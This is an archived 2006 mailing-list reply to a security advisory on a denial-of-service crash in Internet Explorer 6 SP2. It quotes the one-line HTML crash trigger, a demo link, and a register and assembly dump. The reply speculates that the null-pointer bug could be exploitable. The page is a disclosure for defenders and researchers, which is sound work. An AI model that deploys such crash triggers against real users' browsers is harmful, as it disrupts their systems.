Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2

from [ad@heapoverflow.com] Network Security [Permanent Link]
Subject: Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2
Date: Fri, 26 May 2006 18:56:28 +0200 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
are you sure dos only ? got a quick look on it , and if you are able to
control this null pointer , the bug is exploitable, might be good more
research on this bug.

bugtraq@morph3us.org wrote:

Hash: RIPEMD160


 ---------------------------------------------------

| BuHa Security-Advisory #12    |    May 25th, 2006 |

 ---------------------------------------------------

| Vendor   | MS Internet Explorer 6.0               |

| URL      | http://www.microsoft.com/windows/ie/   |

| Version  | <= 6.0.2900.2180.xpsp_sp2              |

| Risk     | Low (Denial of Service)                |

 ---------------------------------------------------


o Description:

=============


Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser

made by Microsoft and currently available as part of Microsoft Windows.


Visit http://www.microsoft.com/windows/ie/default.mspx or

http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.


o Denial of Service: <mshtml.dll>#7d6d2db4

===================


Following HTML code forces MS IE 6 to crash:


<applet><h4><title> </title><base>



Online-demo:

http://morph3us.org/security/pen-testing/msie/ie60-1132901785453-7d6d2db4.html


These are the register values and the ASM dump at the time of the access

violation:


eax=00000000 ebx=00000000 ecx=00e78d38 edx=00e7a704 esi=0012a268



edi=00000000 eip=7d6d2db4 esp=0012a228 ebp=0012a25c




        7d6d2d7d e868f9ffff       call    mshtml+0x2226ea (7d6d26ea)



        7d6d2d82 50               push    eax



        7d6d2d83 e835f8ffff       call    mshtml+0x2225bd (7d6d25bd)



        7d6d2d88 85c0             test    eax,eax



        7d6d2d8a 8945f8           mov     [ebp-0x8],eax



        7d6d2d8d 0f85c4020000     jne     mshtml+0x223057 (7d6d3057)



        7d6d2d93 8b461c           mov     eax,[esi+0x1c]



        7d6d2d96 8b4e18           mov     ecx,[esi+0x18]



        7d6d2d99 8365f400         and     dword ptr [ebp-0xc],0x0



        7d6d2d9d 8365fc00         and     dword ptr [ebp-0x4],0x0



        7d6d2da1 8b7e14           mov     edi,[esi+0x14]



        7d6d2da4 8945f0           mov     [ebp-0x10],eax



        7d6d2da7 e88462e4ff       call    mshtml+0x69030 (7d519030)



        7d6d2dac 3bc7             cmp     eax,edi



        7d6d2dae 0f8402020000     je      mshtml+0x222fb6 (7d6d2fb6)



FAULT ->7d6d2db4 8b07             mov     eax,[edi]



                                          ds:0023:00000000=????????



        7d6d2db6 8bc8             mov     ecx,eax



        7d6d2db8 83e10f           and     ecx,0xf



        7d6d2dbb 49               dec     ecx



        7d6d2dbc 0f849c010000     je      mshtml+0x222f5e (7d6d2f5e)



        7d6d2dc2 49               dec     ecx



        7d6d2dc3 0f84b3000000     je      mshtml+0x222e7c (7d6d2e7c)



        7d6d2dc9 49               dec     ecx



        7d6d2dca 49               dec     ecx



        7d6d2dcb 746c             jz      mshtml+0x222e39 (7d6d2e39)



        7d6d2dcd 83e904           sub     ecx,0x4



        7d6d2dd0 0f85a5010000     jne     mshtml+0x222f7b (7d6d2f7b)



        7d6d2dd6 8bcf             mov     ecx,edi



        7d6d2dd8 e8482ffeff       call    mshtml+0x205d25 (7d6b5d25)



        7d6d2ddd 85c0             test    eax,eax



        7d6d2ddf 7430             jz      mshtml+0x222e11 (7d6d2e11)



        7d6d2de1 837e0400         cmp     dword ptr [esi+0x4],0x0



This issue is a non-exploitable Null Pointer Dereference vulnerability and

leads to DoS.


o Vulnerable versions:

=====================


The DoS vulnerability was successfully tested on:


MS IE 6 SP2 - Win XP Pro SP2



MS IE 6     - Win 2k SP4



o Disclosure Timeline:

=====================


xx Feb 06 - Vulnerabilities discovered.

08 Mar 06 - Vendor contacted.

22 Mar 06 - Vendor confirmed vulnerabilities.

25 May 06 - Public release.


o Solution:

==========


I think - this is not an official statement from the Microsoft Security

Response Center - the vulnerability will be fixed in an upcoming service

pack.


o Credits:

=========


Thomas Waldegger <bugtraq@morph3us.org>

BuHa-Security Community - http://buha.info/board/


If you have questions, suggestions or criticism about the advisory feel

free to send me a mail. The address 'bugtraq@morph3us.org' is more a

spam address than a regular mail address therefore it's possible that

some mails get ignored. Please use the contact details at

http://morph3us.org/ to contact me.


Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all

members of BuHa.


Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-1.txt


--

Don't you feel the power of CSS Layouts?

BuHa-Security Community: http://buha.info/board/



__________ NOD32 1.1560 (20060526) Information __________

This message was checked by NOD32 antivirus system.
http://www.eset.com





-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.1 (MingW32)
 
iD8DBQFEdzM8FJS99fNfR+YRAsjuAKCBW98EprQ74gqSQbZyxE9pX3LJSgCfbnW3
xga88FMjNWjJ0eWSeiav4dM=
=kk0I
-----END PGP SIGNATURE-----

Attachment: ad.vcf
Description: Vcard

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  RE: Realty Pro One Property Listing Script, Krpata, Tyler
Next by Date:  [Full-disclosure] rPSA-2006-0083-1 enscript, Justin M. Forbes
Previous by Thread:  [BuHa-Security] DoS Vulnerability in MS IE 6 SP2, bugtraq
Next by Thread:  [BuHa-Security] MS06-013: HTML Tag Memory Corruption Vulnerability in MS IE 6 SP2, bugtraq
Indexes:  [Date] [Thread] [Top] [All Lists]